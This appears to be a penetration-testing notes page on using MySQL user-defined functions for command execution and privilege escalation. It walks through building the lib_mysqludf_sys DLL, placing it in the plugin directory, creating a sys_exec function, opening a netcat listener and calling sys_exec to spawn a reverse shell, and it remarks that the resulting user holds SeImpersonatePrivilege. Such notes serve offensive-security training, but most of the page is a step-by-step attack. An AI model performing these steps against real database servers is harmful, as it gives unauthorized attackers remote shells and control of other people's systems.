Library - MySQL UDF

If the mysql server is running as root (or a different more privileged user) you can make it execute commands. For that, you need to use user defined functions. And to create a user defined you will need a library for the OS that is running mysql.

The malicious library to use can be found inside sqlmap and inside metasploit by doing locate "*lib_mysqludf_sys*". The .so files are linux libraries and the .dll are the Windows ones, choose the one you need.

If the following steps do not work, check the link above!

  1. Let's grab the following code. https://gist.githubusercontent.com/kazkansouh/3476a8c8846472da06f980494ac2c457/raw/559eb0dc4f4d0d5d1fbf69e2965bda292f8511ff/mysql-udf-build.sh

  2. Run the script. You will see a dll (lib_mysqludf_sys_win_64.dll) created in local directory. 

./mysql-udf-build.sh 64 win .

  1. Connect to the Database

  1. Wtih snap, run the following command.

sudo snap install dbeaver-ce

  1. Run dbeaver-ce and supply 'IP address' and a credential to connect.

  2. Check the plugin directory. Run the following SQL script. 

SHOW VARIABLES LIKE 'plugin_dir';

  1. Check or/and create a directory to the plugin (C:\xampp\mysql\lib\plugin\)

  2. Store lib_mysqludf_sys_win_64.dll there (C:\xampp\mysql\lib\plugin\lib_mysqludf_sys_win_64.dll)

  3. Run the following SQL query to create a function. 

CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_win_64.dll';

  1. Set up a listener. 

rlwrap nc -nlvp 4444

  1. Run the following SQL query to run a reverse shell. 

select sys_exec('shell') # Use a powershell encrypted one

Connected. This time, this user has a SeImpersonatePrivilege.

PreviousWrite permissionNextLinux Priv

Last updated